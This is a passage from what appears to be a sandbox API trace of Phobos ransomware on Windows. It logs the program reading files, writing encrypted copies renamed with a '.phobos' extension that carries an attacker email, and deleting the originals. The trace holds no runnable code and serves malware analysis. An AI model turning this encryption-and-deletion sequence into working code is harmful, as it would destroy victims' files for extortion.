phKey=0x2c9fba8*=0xa32ca8) returned 1 [0184.085] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.085] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0184.086] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.086] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0184.086] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.086] CloseHandle (hObject=0x17c) returned 1 [0184.086] CloseHandle (hObject=0x178) returned 1 [0184.086] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe")) returned 1 [0184.092] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0184.092] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.092] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=143360) returned 1 [0184.092] CloseHandle (hObject=0x178) returned 1 [0184.092] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi")) returned 0x20 [0184.092] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.092] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.092] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.092] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.092] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.093] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0184.093] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.093] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x23000, lpOverlapped=0x0) returned 1 [0184.236] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x23010, dwBufLen=0x23010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x23010) returned 1 [0184.238] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x23010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x23010, lpOverlapped=0x0) returned 1 [0184.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0184.241] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.241] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0184.241] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.241] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0184.242] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.242] CloseHandle (hObject=0x178) returned 1 [0184.242] CloseHandle (hObject=0x17c) returned 1 [0184.242] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi")) returned 1 [0184.244] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0184.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.254] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1130328) returned 1 [0184.254] CloseHandle (hObject=0x17c) returned 1 [0184.254] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe")) returned 0x20 [0184.254] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.254] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.254] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.295] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0184.295] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.295] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x110100, lpOverlapped=0x0) returned 1 [0184.329] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100, dwBufLen=0x110100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100) returned 1 [0184.338] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110100, lpOverlapped=0x0) returned 1 [0184.367] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3e58, lpOverlapped=0x0) returned 1 [0184.367] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3e60, dwBufLen=0x3e60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3e60) returned 1 [0184.367] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x3e60, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x3e60, lpOverlapped=0x0) returned 1 [0184.368] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a68) returned 1 [0184.368] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.368] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0184.368] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.368] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0184.368] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.368] CloseHandle (hObject=0x17c) returned 1 [0184.368] CloseHandle (hObject=0x130) returned 1 [0184.369] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe")) returned 1 [0184.369] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0184.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.370] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=13643) returned 1 [0184.370] CloseHandle (hObject=0x130) returned 1 [0184.371] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest")) returned 0x2020 [0184.371] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.371] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.371] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.372] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0184.372] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.372] ReadFile (in: hFile=0x130, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x354b, lpOverlapped=0x0) returned 1 [0184.392] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3550, dwBufLen=0x3550 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3550) returned 1 [0184.392] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x3550, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x3550, lpOverlapped=0x0) returned 1 [0184.393] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a68) returned 1 [0184.393] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.393] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0184.393] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.393] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0184.393] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.393] CloseHandle (hObject=0x130) returned 1 [0184.393] CloseHandle (hObject=0x17c) returned 1 [0184.393] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest")) returned 1 [0184.393] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0184.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.394] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3808) returned 1 [0184.394] CloseHandle (hObject=0x17c) returned 1 [0184.394] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms")) returned 0x2020 [0184.394] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.395] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.395] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.396] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0184.396] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.396] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xee0, lpOverlapped=0x0) returned 1 [0184.408] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xef0, dwBufLen=0xef0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xef0) returned 1 [0184.408] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xef0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xef0, lpOverlapped=0x0) returned 1 [0184.408] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a68) returned 1 [0184.408] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.408] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0184.409] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.409] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 